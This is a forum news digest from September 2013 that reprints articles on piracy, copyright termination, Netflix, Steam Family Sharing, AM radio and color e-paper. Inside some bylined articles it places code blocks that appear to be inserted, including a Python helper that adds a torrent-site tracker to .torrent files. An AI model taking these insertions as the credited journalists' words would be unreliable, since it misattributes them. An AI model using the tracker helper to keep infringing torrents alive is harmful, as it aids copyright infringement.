Old 11-09-13, 06:25 AM   #1
JackSpratts
 
 
Join Date: May 2001
Location: New England
Posts: 10,013
Default Peer-To-Peer News - The Week In Review - September 14th, '13

Since 2002

"We hope that the French court will not order us to build a censorship machine." – Google






































September 14th, 2013




Three-Strikes Laws Do Not Reduce Online Piracy: Study
Juha Saarinen

Copyright infringers seek other tools.

New research from Monash University has found "three strikes" or graduated response laws introduced to reduce internet-borne copyright infringement are by and large ineffective and do not steer users towards legitimate sources of content.

Written by Rebecca Giblin at Monash University's Faculty of Law, the research paper (pdf) found no connection between graduated response regimes and reduced piracy.

"There is no evidence demonstrating a causal connection between graduated response and reduced infringement. If 'effectiveness” means reducing infringement, then it is not effective,' Giblin concluded.

The paper considered graduated response systems in France, New Zealand, Taiwan, South Korea and the UK, all of which have enacted laws that penalise customers in some form, with fines and disconnections, for repeated infringements.

France's HADOPI system, which is currently under review by the new government, appeared to be poorly equipped to identify and process the most egregious repeat offenders, Giblin wrote, and the law has done little to quell piracy in the country.

"... when the data is carefully considered, there is scant evidence that the [HADOPI] law actually reduces infringement," Giblin said.

Across the Tasman, research into internet traffic from Waikato University in New Zealand "suggests some ongoing shift in user behavior, and likely some net reduction in infringement," Giblin said. However, the research noted that while the amount of P2P traffic fell, encrypted HTTPS data volumes saw a massive increase.

The Waikato researchers theorised that the increase was caused by a shift towards non-P2P sources of infringing material.

"There is also evidence that the law is driving anti-regulatory activity in New Zealand. Because the NZ scheme applies only to file-sharing via P2P networks, it can be simply bypassed by switching to other tools for infringement," Giblin said.

These tools include Usenet, cyberlockers, VPNs, remote access protocols and so-called seedboxes, which are remote servers hosted on high-speed networks in other jurisdictions, onto which users can download content via BitTorrent and then access directly over an encrypted connection.

Neither the Waikato University research nor rights holders' studies that point to infringing file sharing reducing in New Zealand considered the impact of better access to new, legitimate content services.

In South Korea and Taiwan, graduated response systems appear to have had very little if any impact on copyright infringing file sharing, Giblin wrote.

"Although the Taiwanese scheme has now been in operation for several years, there seems to be no evidence in the English language materials that any user has had their access suspended under the law, or any plausible evidence put forward to suggest it has brought about any reduction of infringement," according to Giblin.

However, one positive side-effect of the Taiwanese scheme was that the country was removed from the United States Trade Representative's special watch list, on which nations that do not comply with American intellectual property legislation are noted for possible sanctions.

Overall, Giblin said: "... the above analysis demonstrates, the evidence that graduated response actually reduces infringement is extraordinarily thin."

Giblin also looked into whether graduated response regimes helped steer users away from infringing content sources and towards legitimate ones instead. She found no evidence of this in either France or South Korea, however.
http://www.itnews.com.au/News/356360...acy-study.aspx





H33T Is Down: Replacement URL Means Filesharing Site Likely To Return Under New Domain
Thomas Halleck

The popular torrent tracking website H33T.com was taken down on Friday by its domain registrar, apparently due to a court order over a copyright dispute.

Leaseweb, the service provider tasked with hosting the file-sharing community’s domain name, said the site’s domain had been “temporarily” disabled “due to receipt of a court order,” according to P2P news site TorrentFreak. The file-sharing site is down as of Saturday morning EDT, but a replacement URL is live.

Leaseweb is a Dutch company that manages H33T’s URL, and it appears that a copyright holder requested that the site be disabled for failing to comply with a takedown request. H33T’s administrators originally charged copyright holders $50 to take down a torrent.

The new site, located at H33T.eu, does not currently have any functionality other than displaying the following message:

If you are seeing this message then you have found the new .eu domain

The h33t tracker is also online. add the new announce [sic] to your torrents to keep them alive udp://fr33domtracker.h33t.eu:3310/announce

Thank you for your patience, it will be business as usual very shortly, enjoy the h33t
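
The site's notice above tells users to add the new announce URL to their existing torrents. For anyone wondering what that involves under the hood, below is a minimal, self-contained Python sketch that appends a tracker to a .torrent file's announce-list. The bencode helpers and the add_tracker function are written purely for illustration and aren't taken from any particular client or library; a real BitTorrent client does this for you from its UI.

# Minimal bencode decode/encode plus a helper that appends a tracker URL
# to a .torrent file's announce-list. Illustrative sketch only.

def bdecode(data, i=0):
    c = data[i:i+1]
    if c == b'i':                      # integer: i<digits>e
        j = data.index(b'e', i)
        return int(data[i+1:j]), j + 1
    if c == b'l':                      # list: l<items>e
        items, i = [], i + 1
        while data[i:i+1] != b'e':
            v, i = bdecode(data, i)
            items.append(v)
        return items, i + 1
    if c == b'd':                      # dict: d<key><value>...e
        d, i = {}, i + 1
        while data[i:i+1] != b'e':
            k, i = bdecode(data, i)
            v, i = bdecode(data, i)
            d[k] = v
        return d, i + 1
    j = data.index(b':', i)            # byte string: <len>:<bytes>
    n = int(data[i:j])
    return data[j+1:j+1+n], j + 1 + n

def bencode(obj):
    if isinstance(obj, int):
        return b'i%de' % obj
    if isinstance(obj, bytes):
        return b'%d:%s' % (len(obj), obj)
    if isinstance(obj, list):
        return b'l' + b''.join(bencode(x) for x in obj) + b'e'
    if isinstance(obj, dict):
        return b'd' + b''.join(bencode(k) + bencode(v)
                               for k, v in sorted(obj.items())) + b'e'
    raise TypeError('cannot bencode %r' % type(obj))

def add_tracker(path, announce=b'udp://fr33domtracker.h33t.eu:3310/announce'):
    """Append the announce URL as a new tier in the torrent's announce-list."""
    with open(path, 'rb') as f:
        meta, _ = bdecode(f.read())
    tiers = meta.setdefault(b'announce-list',
                            [[meta[b'announce']]] if b'announce' in meta else [])
    if not any(announce in tier for tier in tiers):
        tiers.append([announce])
    with open(path, 'wb') as f:
        f.write(bencode(meta))

# add_tracker('some.torrent')   # then force a re-check/re-announce in your client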


Leaseweb originally hosted the file-sharing site Megaupload, run by Kim Dotcom, before being issued a takedown notice and eventually terminating the site. The company has since been criticized by Dotcom for wiping Megaupload data that existed before the site was shut down.

Another popular peer-to-peer torrent site, KickassTorrents (KAT.PH), went down earlier this year following a domain seizure, only to return with a new URL (Kickass.to).
http://www.ibtimes.com/h33t-down-rep...domain-1403365





Italy's New Wave Scene Was the Product of Vintage Filesharing
Daniel Stuckey

I recently watched Joseph Gordon-Levitt's recruitment video for hitRECord—that site of his where writers, artists and 'creatives' upload hours and pages of unfinished content in an attempt to produce collaborative work. Although it feels like a fresh concept, JGL and his brother actually came up with it eight years ago.

But 25 years before that, a counterculture of squatters from northern Italy was making its own crowdsourced art and music projects.

Mutazione, compiled by Alessio Natalizia of WALLS, is a collection of Italy's finest and rarest new wave music from the 80s. Featuring the likes of Doris Norton, whom Apple commissioned to make computer music in 1984, the compilation is like a time capsule with contents that still feel far ahead of their time.

Fed up with the political unrest between the '60s and '80s, the artists created a deeply psychological soundtrack in return. Rioting, street fighting and political assassination had become commonplace; Italy's intellectual hubs, Emilia Romagna and Tuscany, were buzzing with activism and this computerized, junkyard soundtrack.

Through vintage forms of social networking and filesharing, a community-collaborative process steered their scene for eight years. In Milan, a collective called TRAX (as explained in the video above) would publish zines and records that predated terms like crowdsourcing and Creative Commons but grasped some similar concepts. For instance, they'd make songs together where the first person recorded a track on a tape, sent the tape to the next collaborator, and so forth.

One of the tracks on the mix, "Niccolai," by Laxative Souls, features samples from a phone call in which a terrorist group gives directions to the location of the body of Aldo Moro, the leader of the Christian Democrats, who was murdered in 1978. Indeed, this compilation isn't contemporary electronic music, but in my opinion, better. These are the lo-fi, retro-future electronic music pioneers, and honestly, contemporary EDM artists will need to learn a thing or two from Mutazione.
http://motherboard.vice.com/blog/ita...ge-filesharing





Netflix Uses Pirate Sites to Determine What Shows to Buy
Ernesto

This week Netflix rolled out its video streaming service in the Netherlands where it hopes to build a massive user base in the years to come. One of the keys to achieve this goal is getting the rights to the most popular movies and TV-shows, and this is where pirate sites come in. Netflix Vice President of Content Acquisition Kelly Merryman says that popularity on file-sharing platforms determines in part what TV-series the company buys.

Video streaming giant Netflix sees itself as one of the most prominent competitors to the many pirate sites that offer video content without owners’ permission.

However, these pirate sites also offer Netflix valuable information as to what video content they should acquire for their service.

This week Netflix rolled out its service in the Netherlands and the company’s Vice President of Content Acquisition, Kelly Merryman, says that their offering is partly based on what shows do well on BitTorrent networks and other pirate sites.

“With the purchase of series, we look at what does well on piracy sites,” Merryman told Tweakers.

One of the shows that Netflix acquired the rights to in the Netherlands is Prison Break, since it is heavily pirated locally. “Prison Break is exceptionally popular on piracy sites,” Merryman says.

In a separate interview Netflix CEO Reed Hastings adds that his company is aware of the many people who download content without permission via torrent sites. However, this is not exclusively a bad thing, as it also creates demand for the content Netflix is offering.

“Certainly there’s some torrenting that goes on, and that’s true around the world, but some of that just creates the demand,” Hastings says.

Eventually these BitTorrent users may want to switch to Netflix as it’s a much better user experience than torrenting, according to the CEO.

“Netflix is so much easier than torrenting. You don’t have to deal with files, you don’t have to download them and move them around. You just click and watch,” Hastings says.

One goal of Netflix is to convert people who currently use pirate sites to get their fix, and there is some evidence that this is indeed happening. According to Hastings, there is evidence that BitTorrent traffic in Canada dropped 50% after Netflix started there three years ago.

The real challenge for the streaming service is to license as much content as they can, which is easier said than done. It might not be a coincidence that “Game of Thrones” is the most pirated TV-show. After all, Netflix wasn’t able to buy the rights from HBO no matter what they offered.
http://torrentfreak.com/netflix-uses...to-buy-130914/





Culture is Not About Aesthetics. Punk Rock is Now Enforced By Law.
David Gerard

Record companies complain the Internet will destroy music. Musicians complain that they can’t make a living any more. The unsympathetic public, feeling the squeeze themselves, tell them to get a proper job.

The problem isn’t piracy — it’s competition.

There is too much music and too many musicians, and the amateurs are often good enough for the public. This is healthy for culture, not so much for aesthetics, and shit for musicians. Musicians in the early ’90s were already feeling the pressure of competition from CD reissues of old stuff; here in the future, you can get almost anything that has ever been digitised for free and listener time is the precious commodity.

There is no shortage of genius works.

As Gwern Branwen notes, culture is not about aesthetics. There are too many brilliant records. There are too many brilliant books. He does the numbers to demonstrate the impossibility of keeping up, and the impossibility of ever having been able to keep up, even back in the twentieth century, when everything was really slow and records cost money.

The purpose of culture is actually social bonding — like you thought all those bad genres you’re not into were — and aesthetics to our level of obsession is just a nice extra along for the ride, and fodder for social signaling (which is why governments spend money on art funding). Culture is everything humans do to interact, and having it go through record companies is actually a completely weird state of affairs.

The problem then is not genius works, but finding, and making, them in your chosen aesthetic vocabulary (the one fixed in a couple of years of your adolescence).

If you’re thinking about money, you’re a small business. You poor bastard.

Economically, the 20th century was just a weird time: where it was possible to mass-produce recordings, but it was difficult and expensive; so we had a record company oligopoly, which is great for squeezing out cash. Now it’s not. Marginal cost approaches zero, and it’s marginal cost, not setup cost, that determines prices. So the price will tend to zero. Microeconomics is a bastard.

In most small businesses, pricing is a percentage whacked onto the marginal cost, and the setup cost is paid for in the percentage. Your setup costs are S (recording, designing the packaging, etc.). You can’t charge the customer upfront for those so you need to whack a percentage margin onto your marginal costs. This is the cost of each additional unit after the setup costs (pressing one more record, shipping one record, etc.), which are M per unit. So your total cost is S plus (M times units), and your return is (M plus percentage) times units.

This works when your marginal costs are large enough to whack a sufficient percentage onto (e.g., a CD) to cover S. It doesn't when your marginal cost is almost zero (an MP3). Anyone can undercut you by taking a lower percentage on the marginal cost, and if their setup costs are also smaller they're laughing. Thus, prices tend to drop as close to marginal cost as is possible. If that's zero, that's what people expect to pay.
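
To make the arithmetic above concrete, here is a small worked sketch of the break-even point. The figures are invented for illustration; only the "S plus M times units" model comes from the paragraphs above.

# Break-even under the pricing model described above: setup cost S is
# repaid out of the margin whacked onto each unit's marginal cost M.
import math

def units_to_break_even(setup_cost, margin_per_unit):
    """How many units you must sell before the per-unit margin repays S."""
    return math.ceil(setup_cost / margin_per_unit)

# A CD: the marginal cost is big enough to carry a meaningful margin.
print(units_to_break_even(setup_cost=5000, margin_per_unit=4.00))   # 1250 discs

# An MP3: marginal cost is roughly zero, so any margin you charge can be
# undercut; push the margin towards zero and break-even recedes to infinity.
print(units_to_break_even(setup_cost=5000, margin_per_unit=0.10))   # 50000 downloads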

(I was actually surprised iTunes works at all, ever, for anyone — people paying $1 for something of zero marginal cost. Every sale is made because the people wanted to pay for the unit in question. Convenience is worth more than I’d thought.)

The market is not perfectly efficient. But the new degree of efficiency is quite horrifying and unexpected to musicians who started out in the gatekeeper oligopoly, and it’s not going to get less efficient.

Literally everyone is a musician if they want to be. Good for culture, bad for employment.

The serious problem for the working musician, though, isn’t records being cheap — it’s competition from other musicians. Because any talentless hack is now a musician. There are bands who would have trouble playing a police siren in tune, who download a cracked copy of Cubase — you know how much musicians pirate their software, VSTs and sample packs, right? — and tap in every note. There are people like me who do this. A two-hundred-quid laptop with LMMS and I suddenly have better studio equipment than I could have hired for $100/hour thirty years ago. You can do better with a proper engineer in a proper studio, but you don’t have to. And whenever quality competes with convenience, convenience wins every time.

You can protest that your music is a finely-prepared steak cooked by sheer genius, and be quite correct in this, and you have trouble paying for your kitchen, your restaurant, your cow. But everyone else is giving away zero-marginal-cost digital steaks, even if they’re actually reconstituted tofu or maybe poop.

This means art becomes entirely a folk enterprise: the sound of the culture talking amongst itself. This is lovely in its way, but all a bit fucked if you aspire to higher quality in your subcultural group.

We’re not going to run out of music, but it’s going to be a bit mediocre by and by.

(Music journalism might become a profession again. I thought it had been safely killed.)

No, I don’t have a quick answer.

Musicians are in competition with every other musician in the world, including literally everyone who wants to be a musician and doesn’t have to do it for money. All of whom have access now to the same outlets and channels the other musicians do. We have the technology; it’s cheap. The amateurs are frequently good enough for the public. The professionals sell fuck-all these days.

For live musicians, you’re in economic competition with every other thing in the world that isn’t going out to see a band — like, ooh, the Internet — and you know the pubs know it.

A few established bands have managed to record albums through Kickstarter-style pledge arrangements: charging directly on the setup cost, not the marginal cost. You do need to have a fanbase to leverage first.

The obvious answer is the destruction of neoliberalism, of bullshit jobs and indeed of the capitalist system in general, and a world where we don’t have to fight in a rat race for scraps from the owners’ tables rather than make music, but that might be a bit complicated to fully outline a viable plan for in a music blog.

Suggestions are welcomed. (I’ll note that “everyone just needs to change their attitude” is unlikely to work in practice.) In the meantime, go buy something from your old favourites, they almost certainly need the cash.

(By the way, this is a problem I personally have: the loved one just quit her job to do art full-time. Here in the future, selling art for money that we seriously need is proving interesting.)
http://rocknerd.co.uk/2013/09/13/cul...forced-by-law/





A Copyright Victory, 35 Years Later
Larry Rohter

In the lucrative world of music copyright, it may be something of a watershed moment: on Friday, after six years of legal wrangling and decades after he wrote the lyrics to the hit song “YMCA,” Victor Willis will gain control of his share of the copyright to that song and others he wrote when he was the lead singer of the 1970s disco group the Village People.

Mr. Willis, who dressed as a policeman during the group’s heyday, was able to recapture those songs, thanks to a little-known provision of copyright legislation that went into effect in 1978. That law granted musicians and songwriters what are known as “termination rights,” allowing them to recover control of their creations after 35 years, even if they had originally signed away their rights.

It is possible, maybe even likely, that other artists who also wrote or recorded songs in 1978 have, after invoking their termination rights, quietly signed new deals with record labels and song publishing companies. But Mr. Willis appears to be the first artist associated with a hit song from that era to announce publicly that he has used his termination rights to regain control of his work.

“YMCA” is one of 33 songs whose copyright Mr. Willis was seeking to recover when he first went to court. Hits like “In the Navy” and “Go West” are part of that group, but another well-known song whose lyrics Mr. Willis wrote, “Macho Man,” was excluded because it was written just before the 1978 law went into effect.

In a telephone interview from his home in Southern California, Mr. Willis said he has not yet decided how best to exploit the song catalog. “I’ve had lots of offers, from record and publishing companies, a lot of stuff, but I haven’t made up my mind how it’s going to be handled.”

He added, however, that he is thinking of prohibiting the Village People — the band still exists and is touring this month and next, though with largely different members — from singing any of his songs, at least in the United States. Under American law, copyright holders have a right to control the performance of a work at any “place open to the public or at a place where a substantial number of persons outside of a normal circle of a family and its social acquaintances are gathered.” This designation applies not only to concert halls, but also to arenas and ballparks like Yankee Stadium, where “YMCA” and other Village People songs are perennial favorites.

“I learned over the years that there are some awesome powers associated with copyright ownership,” Mr. Willis said. “You can stop somebody from performing your music if you want to, and I might object to some usages.”

Song publishing and record companies have consistently opposed artists’ efforts to invoke termination rights, which have the potential to affect a company’s bottom line severely. They argue that, in many cases, songs and recordings belong to them in perpetuity, rather than to the artists, because they are “works for hire,” created not by independent contractors but by artists who are, in essence, their employees.

That was initially one of the arguments invoked against Mr. Willis in Federal District Court in Los Angeles. “We hired this guy,” Stewart L. Levy, a lawyer for the companies that controlled the Village People song catalog, said last year. “He was an employee. We gave them the material and a studio to record in and controlled what was recorded, where, what hours and what they did.” Eventually, though, that argument was withdrawn. If the “work for hire” doctrine can’t be made to apply to a prefab group like the Village People, it stands little chance of surviving a test against other artists who emerged in the 1970s and who always had a much greater degree of autonomy, like Bruce Springsteen, the Eagles, Billy Joel and Parliament-Funkadelic.

That does not mean that the litigation over the Village People catalog is over, however. Though Mr. Willis’s songwriting partner Jacques Morali died in 1991, a third name, that of the French record producer Henri Belolo, appears as a co-writer on “YMCA” and other songs, and the distribution of songwriting credits and revenues is now in court.

“The termination is going to occur,” said Jonathan Ross, one of Mr. Willis’s lawyers. “What is in dispute is how much he is getting back, one-half or one-third.”

In an e-mail he sent from Europe, Mr. Levy challenged that interpretation. “Since an appeal of the court’s decision permitting such reversion has yet to be taken, it is far from certain that Mr. Willis will, at the end of the day, ever gain control over any share of the copyrights in the disputed songs.” As a result, he maintained, any “article on his recapture is, therefore, premature and misleading.”

Mr. Willis had declined interview requests during earlier stages of the dispute, but said he decided to speak out now so as to alert other artists, both established and emerging, to protect their copyrights. He said it was only because his wife is a lawyer that he became aware of his termination rights.

“I’m hoping that other artists will get a good lawyer and get back the works that a lot of us gave away when we were younger, before we knew what was going on,” he said. “When you’re young, you just want to get out there and aren’t really paying attention to what’s on paper. I never even read one contract they put in front of me, and that’s a big mistake.”
http://www.nytimes.com/2013/09/11/ar...ars-later.html





Valve announces Steam 'Family Sharing'
Steve Watts

Steam announced a new "Family Sharing" feature today, and is accepting beta applications to test it. When it launches fully, close friends and family will be able to play one another's games, while still earning their own achievements and saving their individual progress through the cloud.

According to Valve's announcement, you'll be able to browse a family member's library and request authorization to download and play the game for yourself. You'll be able to share on up to 10 devices at a time, and sharing access means your partners will be able to look at your entire library. The FAQs do note that technical limitations like a third-party key might not allow for universal sharing, and a shared library can only be accessed by one user at a time.

You can signal your interest by joining the Family Sharing group. The beta will begin in mid-September.

The FAQs also address some nuts and bolts of how it will all work. As the lender, you'll always have access to your games. Playing when a borrower is already playing will give them a few minutes to either purchase it themselves, or quit for the time being. Borrowers will also have access to all of the lender's DLC, but they won't be able to purchase DLC for a game they don't own if the lender doesn't already have it. Region restrictions will remain in place as well, and Valve recommends you only lend to trusted family and friends, since your sharing could be revoked if one of your borrowers cheats with your games.
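
As a rough way to picture those rules, here is a toy model of the lending constraints described above: one user in a shared library at a time, the lender always wins, and a pre-empted borrower gets a short grace period to buy the game or quit. The class, method names and the five-minute figure are invented for illustration; this is a sketch of the described behaviour, not Valve's API.

# Toy model of the Family Sharing rules described above. Not Valve's API;
# names and the grace-period length are assumptions made for illustration.
from dataclasses import dataclass, field
from typing import Optional, Set

GRACE_MINUTES = 5  # Valve's FAQ says "a few minutes"; exact value assumed

@dataclass
class SharedLibrary:
    owner: str
    authorized: Set[str] = field(default_factory=set)  # shared with trusted users
    active_user: Optional[str] = None                   # one user at a time

    def request_play(self, user: str) -> str:
        if user != self.owner and user not in self.authorized:
            return "denied: not authorized for this library"
        if self.active_user in (None, user):
            self.active_user = user
            return "playing"
        if user == self.owner:
            # The lender always has access; the borrower gets a grace period
            # to buy the game or quit.
            evicted, self.active_user = self.active_user, user
            return f"playing; {evicted} has {GRACE_MINUTES} minutes to buy or quit"
        return f"busy: {self.active_user} is already using this library"

lib = SharedLibrary(owner="alice", authorized={"bob"})
print(lib.request_play("bob"))    # playing
print(lib.request_play("alice"))  # playing; bob has 5 minutes to buy or quit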

The feature is especially notable in light of the upcoming Xbox One launch. Family Sharing was one of Microsoft's planned features, but the reversal of its always-online policy meant the sharing feature was lost as well.
http://www.shacknews.com/article/810...family-sharing





A Quest to Save AM Before It’s Lost in the Static
Edward Wyatt

Is anyone out there still listening?

The digital age is killing AM radio, an American institution that brought the nation fireside chats, Casey Kasem’s Top 40 and scratchy broadcasts of the World Series. Long surpassed by FM and more recently cast aside by satellite radio and Pandora, AM is now under siege from a new threat: rising interference from smartphones and consumer electronics that reduce many AM stations to little more than static. Its audience has sunk to historical lows.

But at least one man in Washington is tuning in.

Ajit Pai, the lone Republican on the Federal Communications Commission, is on a personal if quixotic quest to save AM. After a little more than a year in the job, he is urging the F.C.C. to undertake an overhaul of AM radio, which he calls “the audible core of our national culture.” He sees AM — largely the realm of local news, sports, conservative talk and religious broadcasters — as vital in emergencies and in rural areas.

“AM radio is localism, it is community,” Mr. Pai, 40, said in an interview.

AM’s longer wavelength means it can be heard at far greater distances and so in crises, he said, “AM radio is always going to be there.” As an example, he cited Fort Yukon, Alaska, where the AM station KZPA broadcasts inquiries about missing hunters and transmits flood alerts during the annual spring ice breakup.

“When the power goes out, when you can’t get a good cell signal, when the Internet goes down, people turn to battery-powered AM radios to get the information they need,” Mr. Pai said.

He admits to feelings of nostalgia. As the son of Indian immigrants growing up in small-town Parsons, Kan., he listened to his high school basketball team win a 1987 championship, he said. “I sat in my bedroom with my radio tuned into KLKC 1540,” he recalled. On boyhood family road trips across the wide Kansas plains, he said, AM radio “was a constant companion.”

But that was then. In 1978, when Mr. Pai was 5, half of all radio listening was on the AM dial. By 2011 AM listenership had fallen to 15 percent, or an average of 3.1 million people, according to a survey by Veronis Suhler Stevenson, a private investment firm. While the number of FM listeners has declined, too, they still averaged 18 million in 2011. (The figures are averages based on measuring listeners every 15 minutes.)

Although five of the top 10 radio stations in the country, as measured by advertising dollars, are AM — among them WCBS in New York and KFI in Los Angeles — the wealth drops rapidly after that. In 1970 AM accounted for 63 percent of broadcast radio stations, but now it accounts for 21 percent, or 4,900 outlets, according to Arbitron. FM accounts for 44 percent, or 10,200 stations. About 35 percent of stations stream content online.

“With the audience goes the advertising revenues,” said Milford Smith, vice president for radio engineering at Greater Media, which owns 21 stations, three of them AM. “That makes for a double whammy.”

Nearly all English-language AM stations have given up playing music, and even a third of the 30 Major League Baseball teams now broadcast on FM. AM, however, remains the realm of conservative talk radio, including roughly 80 percent of the 600 radio stations that carry Rush Limbaugh. Talk radio has helped keep AM alive.

“If it had to rely on music,” said Michael Harrison, editor and publisher of Talkers magazine, “AM radio would be dead.”

But why try to salvage AM? Critics say its decline is simply natural selection at work, and many now support converting the frequency for use by other wireless technologies. A big sign of AM’s weakness is that one hope for many of its stations may be channeling their broadcasts onto FM.

Not so fast, said Mr. Pai, who has been pushing the F.C.C.’s interim chairwoman, Mignon Clyburn, to put the revitalization of AM high on the agency’s agenda.

“I’m obviously bullish on next-generation technology,” Mr. Pai said. “But I certainly think there continues to be a place for broadcasting and for AM radio.”

Mr. Pai said he was not promoting AM to advance conservative talk radio, but part of his prescription treads a traditional Republican path. He wants to eliminate outdated regulations, for example, like one that requires AM stations to prove that any new equipment decreases interference with other stations, a requirement that is expensive, cumbersome and difficult to meet.

Mr. Pai also wants to examine a relatively new technology known as HD Radio, which has allowed some stations to transmit a digital signal along with their usual analog wave, damping static. (HD Radio is a brand name; it does not stand for high definition, as in HDTV.) But some critics still fault the F.C.C. for allowing too many broadcasters to crowd into a relatively narrow AM band of airwaves.

In the longer term, Mr. Pai said, the F.C.C. could mandate that all AM stations convert to digital transmission to reduce interference. Such a conversion, however, would cost consumers, who would have to replace the hundreds of millions of AM radios that do not capture digital transmissions.

Finally, Mr. Pai wants the F.C.C. to consider what are called FM translators, which send duplicate AM broadcasts over FM airwaves and help to reduce interference. In 2009, the F.C.C. granted permission to AM stations to use such translators.

“Our business has improved rather dramatically” since the conversion to dual bands, said Bud Walters, owner of Cromwell Group, which operates 23 stations in four states, six of them on the AM band and five of which share translators.

The F.C.C. has said it is behind Mr. Pai, although it is a long way from committing to the overhaul he envisions. In August the commission approved a measure requiring the builders of any new radio tower to compensate an AM station if the tower interferes with the station’s broadcast.

Some station owners want more. David Honig, the president of the Minority Media and Telecommunications Council, said that the F.C.C. had before it 37 proposals that would expand opportunities for minority ownership but do not require giving minority-owned radio groups special rights. Two-thirds of minority-owned radio stations broadcast on AM.

The reality, however, is that even if the F.C.C. reduces regulation and provides compensation for AM stations, it cannot repeal the laws of physics.

Nearly every recently manufactured electronic consumer product — not just proliferating smartphones but televisions, home air-conditioning systems, refrigerators, computers and even energy-saving fluorescent light bulbs — emits radio signals that can interfere with AM broadcasts.

The economic boom of the 1980s and 1990s also contributed to the problem with an increase in the construction of tall buildings in suburban areas and beyond, blocking AM signals. Another issue is that the F.C.C. requires most stations to turn off or greatly reduce signals at night, a rule aimed at keeping high-powered AM stations from interfering with smaller local ones.

(The rule, which hardly engenders loyalty among listeners, was adopted because of the way radio waves in the AM frequency travel. Once the sun goes down, AM signals bounce off the ionosphere and reflect back down to earth hundreds of miles from where they originated. That is why listeners of WRDN-AM (1430) in Durand, Wis., for example, on some nights discover they are inadvertently tuned in to a broadcast from St. Louis.)

Mr. Pai said that unless the problems with AM radio were fixed, people would keep fleeing. “There are plenty of other options,” he said. “They will switch the dial to something else.”
http://www.nytimes.com/2013/09/09/us...he-static.html





The Once-Bright Future of Color E-Paper
Sean Buckley

It's all too easy to dismiss the optimistic fantasies of yesterday: flying cars and robot servants may have filled the pages of Popular Mechanics in the 1950s, but today we're better grounded in reality, pinning our hopes on more reasonable futures based on technology we've actually developed. Still, even those predictions fall flat sometimes, and it can burn to look back at the track record of a horse we once bet on. For this editor, that stallion was known as color e-paper, a series of dimly hued electronic-paper technologies that teased a future of low-power gadgets with beautiful, sunlight-readable matte displays. Prototypes from half a dozen firms exhibited tantalizing potential for the last half of the 2000s, and then promptly vanished as the decade came to a close. Like many ill-conceived futurist predictions, expectations for this technology gently faded from the consumer hive mind.

The legacy of color e-paper may be muted and dim, but its past, at least, is black-and-white: monochrome E Ink set the tone for a decade of reflective, low-power displays. Years before the iPad and other tablets created the so-called third device, sunlight-readable E Ink screens nestled into the public consciousness with Amazon's inaugural Kindle. Launched in 2007, it was a blocky, expensive and awkward device that had more potential than practical application, but the visibility of the Amazon brand lifted its stature. Consumers paid attention and the e-reader category was forged.

Naturally, it didn't take long for consumers to want more -- sure, a sunlight-readable display that lasted for days on a single charge was great, but what about color? This, too, was in the works for a few years, but progress was slow. Early prototypes from Fujitsu did a decent job of mirroring their monochrome cousins' modest power consumption, but images often appeared washed out and faded, like a newspaper left in the sun too long. The technology failed to beat the next Kindle to market, but improved as the years went on. In the meantime, Barnes & Noble added a splash of color to the e-reader market by attaching a secondary, peripheral LCD display to its Nook e-reader -- providing a vibrant and active navigation hub under its reading surface.

The race to create a consumer-ready color e-paper display heated up as Barnes & Noble, Sony and Amazon fought over market share -- if electronic reading devices were to be the next big thing, then surely color would be the category's killer feature. Companies like Samsung, Bridgestone, E Ink (then known as PVI), Fujitsu, Qualcomm, Philips and Plastic Logic spent the better parts of 2009 and 2010 teasing us with brighter screens, faster refresh rates and flexible-display technology.

Despite the excitement surrounding color e-paper, however, few firms were actually ready to put their cards on the table. In early 2010, Amazon CEO Jeff Bezos dispelled rumors of an incoming Kindle Color, saying that current prototypes were simply "not ready for prime-time production," based on what he'd seen in the company's labs. Sony also dodged the subject, committing itself to its existing line of monochrome e-readers until higher-quality panels were available. Even the companies behind the technology openly admitted that it wasn't ready -- PVI and Qualcomm both delayed their respective E Ink Triton and Mirasol color displays, independently describing them as unsatisfactory. Worse still was the high cost of color e-paper development, which drove Samsung to back out of the industry in 2010.

Unfortunately, the delays didn't stave off consumer demand for a color reading device, and it came to market through the path of least resistance: the LCD. This veteran technology may not have been able to compete with color e-paper in the arenas of power consumption or visibility in direct sunlight, but it made up for these faults with bright, accurate color reproduction and the ability to play back video content. More importantly, the technology was available, and the growing tablet market soon offered a ready alternative to the developing color e-paper technology. Companies betting on color e-paper were soon forced to re-evaluate their strategies, Qualcomm told Engadget back at SID 2011, citing Apple's inaugural tablet as the catalyst for its partners' reconsideration.

The original iPad didn't kill the color e-reader independently, of course -- the device was simply too large and too expensive to scratch the itch for every digital-reading enthusiast with an eye for color. Barnes & Noble's first full-color e-reader didn't have these problems. Launched in late 2010 for $250, the 7-inch Nook Color was the right device at the right time, introducing an affordable color reading device while simultaneously giving the bookseller an edge in the growing e-reader market. It didn't take long for Amazon to react to the positive consumer response, launching its own LCD color e-reader, the Kindle Fire, for a scant $200 the following year. The color e-paper offerings of the same era just couldn't compete -- Kyobo's $310 Mirasol eReader was panned for having poor battery life and unstable software, and an E Ink Triton device by Hanvon priced itself out of the market with a staggering $530 sticker. What's worse, consumers didn't even seem to know these products existed. The damage was done; the category's biggest brands knew they could create a successful color e-reader without next-generation e-paper. By the time ASUS and Google trumped the Kindle Fire with the Nexus 7, the technology was all but forgotten.

Color e-paper may have faded from the public consciousness after media tablets usurped its role in the consumer electronics space, but the technology itself lives on, albeit dimly. PVI, a company so dedicated to reflective-display technology that it changed its name to E Ink Holdings Incorporated, refocused its efforts on new markets, creating programmable supermarket price tags and digital billboards for European firms. It's even limping along in the color e-reader space, although we wouldn't call it a major player -- the most recent device to sport the company's Triton color E Ink display, the Jetbook, sells for an astounding $500. Hardly priced to sell, but the company tells us that it has seen some success in European classrooms. Despite these efforts, the company isn't exactly shining: in its Q2 2013 financial report, E Ink posted a $33.6 million loss -- its biggest in four years. Citing numbers from IHS, the report optimistically looked to Western European purchasing trends to cushion the blow, but more telling are the losses suffered in North America, which is now exhibiting a 15 percent loss in worldwide e-reader shipments when compared to 2011. The devices just aren't selling as fast as they used to.

Other companies are sending mixed messages. Qualcomm's Mirasol technology shipped in precious few devices before the company put a lid on production last summer, yet it continues to demonstrate new and intriguing prototypes. At SID 2013, for instance, the company trotted out a smartphone with a reflective 5.1-inch, 2,560 x 1,440 display and a 1.5-inch smartwatch, teasing a future of color e-paper-equipped hardware. The company was quick to point out that the devices were mere mock-ups, but a similar watch surfaced at the company's Uplinq developer conference earlier this week, taking the name of Toq. The smartphone display is still missing in action, however, and Qualcomm says it'll need a few more years in R&D before it's ready for market. When we asked the company if it was still developing screens for color digital readers, Qualcomm representatives could only tell us that they had nothing new to announce. Clearly the company's Mirasol technology is still moving forward, but the firm seems focused on smaller devices.

